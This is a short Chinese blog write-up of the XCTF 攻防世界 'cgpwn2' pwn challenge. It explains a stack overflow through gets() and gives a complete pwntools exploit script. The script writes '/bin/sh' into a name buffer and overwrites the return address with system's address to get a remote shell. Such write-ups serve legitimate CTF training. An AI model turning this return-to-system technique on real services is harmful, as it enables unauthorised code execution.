攻防世界pwn-cgpwn2


没有开启任何防护
存在system函数,存在gets函数可溢出

要getshell的话需要构造“/bin/sh”参数,但是本身并没有这个字符串,因此可以在输入name时,输入“/bin/sh",然后在构造payload时将”/bin/sh"的地址写入
from pwn import*

sh = remote()
sys_addr = 0x804855A

name = b'/bin/sh'
name_addr = 0x804A080
payload = b'a' * (0x26 + 4) + p32(sys_addr) + p32(name_addr)

sh.sendlineafter('please tell me your name', name )
sh.sendlineafter('hello,you can leave some message here:', payload)
sh.interactive()

[[攻防世界pwn-string]]


文章作者: xysx
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 xysx !
评论